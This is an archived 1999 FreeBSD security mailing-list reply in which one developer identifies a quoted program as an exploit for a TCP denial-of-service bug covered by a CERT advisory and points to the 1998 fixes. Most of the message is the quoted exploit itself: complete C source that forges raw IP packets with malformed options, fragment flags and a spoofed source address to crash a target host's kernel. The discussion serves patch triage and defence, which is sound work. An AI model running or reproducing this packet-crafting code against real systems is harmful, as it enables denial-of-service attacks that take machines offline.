Date: Mon, 10 May 1999 20:18:03 -0700 From: Don Lewis <Don.Lewis@tsc.tdk.com> To: Darren Reed <avalon@coombs.anu.edu.au>, freebsd-security@FreeBSD.ORG Subject: Re: freebsd mbuf crash Message-ID: <199905110318.UAA26058@salsa.gv.tsc.tdk.com> In-Reply-To: Darren Reed <avalon@coombs.anu.edu.au> "freebsd mbuf crash" (May 5, 1:26am)
next in thread | previous in thread | raw e-mail | index | archive | help
I now suspect this is an exploit for the bug mentioned in CERT Advisory
CA-98-13-tcp-denial-of-service. If so this bug was fixed for FreeBSD
3.0-CURRENT in revision 1.105 of ip_input.c, and revision 1.50.2.22
before 2.2.8-RELEASE. Both fixes were committed on November 11, 1998.
This exploit's use of a large number of options in the IP header seems
to be the tipoff.
On May 5, 1:26am, Darren Reed wrote:
} Subject: freebsd mbuf crash
}
} is this one (below) taken care of ? perhaps a derivitice of this ?
}
} darren
}
} /* freebsd-mbuf-crash.c by Jeff Roberson, (jeffr@nwlink.com). Dec 11 1998.
} * I'm only releasing this as an example because the bug hardly ever reliably crashes a machine.
} */
}
} #include <stdio.h>
} #include <stdlib.h>
} #include <netinet/ip.h>
} #define __FAVOR_BSD
} #include <netinet/tcp.h>
} #include <netinet/in.h>
} #include <sys/socket.h>
} #include <arpa/inet.h>
} #include <netdb.h>
} #include <strings.h>
}
}
} u_long htona(char *host)
} {
} u_long addr;
} struct hostent *hp;
}
} if ((addr=inet_addr(host)) == INADDR_NONE) {
} if ((hp = gethostbyname(host)) == NULL)
} return(-1);
} bcopy(hp->h_addr_list[0], &addr, sizeof(addr));
} }
} return(addr);
} }
}
} int main(int argc, char* argv[])
} {
} char buf[128];
} struct ip *iph = (struct ip *)buf;
} u_char *ipoptions = (u_char *)(buf + sizeof(struct ip));
} struct tcphdr *tcph = (struct tcphdr *)(buf + 60);
} int s, i;
} struct sockaddr_in sin;
}
} if (argc != 2) {
} printf("usage\n\t%s <host>\n", argv[0]);
} exit(1);
} }
} s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
} if (s < 0) {
} perror("socket");
} exit(1);
} }
} sin.sin_family = AF_INET;
} sin.sin_port = htons(7);
} sin.sin_addr.s_addr = htona(argv[1]);
} if (sin.sin_addr.s_addr == -1) {
} printf("Error resolving %s\n", argv[1]);
} exit(1);
} }
}
} bzero(buf, sizeof(buf));
} iph->ip_hl=15;
} iph->ip_v=4;
} iph->ip_len=htons(124);
} iph->ip_id= htons(getpid());
} iph->ip_off= htons(IP_MF);
} iph->ip_ttl = 255;
} iph->ip_p = IPPROTO_TCP;
} bcopy(&sin.sin_addr.s_addr, &iph->ip_dst, sizeof(u_long));
} iph->ip_src.s_addr = htona("10.2.3.4");
} for (i = 0; i < 20;i++) {
} ipoptions[i]=0xff;
} }
} ipoptions[0] = 0xff; /* Made up option */
} ipoptions[1] = 0x1a;
} memset((char *)&ipoptions[2], 0xff, 37);
} ipoptions[39] = 1; /* IP_NOP */
} tcph->th_sport = htons(5505);
} tcph->th_dport = htons(23);
} tcph->th_seq = htonl(0xabcde123);
} tcph->th_ack = htonl(0x321edcba);
} tcph->th_flags = TH_ACK | TH_PUSH;
} tcph->th_win = htons(0x1234);
}
} if (sendto(s, buf, 124, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) < 124) {
} perror("sendto");
} exit(1);
} }
} if (sendto(s, buf, 124, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) < 124) {
} perror("sendto");
} exit(1);
} }
} iph->ip_len = htons(80);
} iph->ip_off = htons(8);
} if (sendto(s, buf, 80, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) < 60) {
} perror("sendto");
} exit(1);
} }
} exit(0);
} }
}
}
}
} To Unsubscribe: send mail to majordomo@FreeBSD.org
} with "unsubscribe freebsd-security" in the body of the message
}-- End of excerpt from Darren Reed
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?199905110318.UAA26058>